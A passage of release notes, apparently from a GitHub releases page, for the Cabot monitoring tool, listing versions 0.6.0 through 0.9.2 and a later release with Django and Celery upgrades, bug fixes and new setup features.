Automatically reload plugins after migrating
Add cabot_alert_slack as default plugin
Upgrade to Django 1.10
Upgrade to Celery 4

Source code(tar.gz)
Source code(zip)










0.9.2(Apr 4, 2017)




Add /about endpoint
Fix rota bug when ical had no timezone
Add User Profile settings link to user dropdown

Source code(tar.gz)
Source code(zip)










0.9.1(Apr 4, 2017)




Update cabot-alert-twilio to 1.3.0 to work on django 1.10
Fix Alert preferences form breaking on django 1.8
Add cabot executable instead of using python manage.py (for e.g. migrating)

Source code(tar.gz)
Source code(zip)










0.8.7(Apr 4, 2017)




Fix Alert preferences form breaking on django 1.8

Source code(tar.gz)
Source code(zip)










0.9.0(Mar 8, 2017)




Upgrade to Django 1.9

Source code(tar.gz)
Source code(zip)
cabot-0.9.0-py2-none-any.whl(5.47 MB)










0.8.6(Mar 8, 2017)




Add first time setup page
Remove create_cabot_superuser management command (redundant with first time setup)

Source code(tar.gz)
Source code(zip)
cabot-0.8.6-py2-none-any.whl(4.44 MB)










0.8.5(Mar 7, 2017)




More severe alerts should trigger even if a less severe alert was recently sent
Update production.env.example email settings
Convert environment vars to boolean nicely


Note: You may need to update your environment files to ensure boolean values are valid

Source code(tar.gz)
Source code(zip)
cabot-0.8.5-py2-none-any.whl(4.44 MB)










0.8.4(Feb 18, 2017)




Fix setup.py packaging
Use whitenoise to serve static files


Note: You may have to update your webserver settings for static files to work properly

Source code(tar.gz)
Source code(zip)
cabot-0.8.4-py2-none-any.whl(4.44 MB)










0.6.0(Feb 18, 2017)




Versioning Introduced.


Note: You must migrate to this version before upgrading to 0.7 or above

Source code(tar.gz)
Source code(zip)
cabot-0.6.0-py2-none-any.whl(84.27 KB)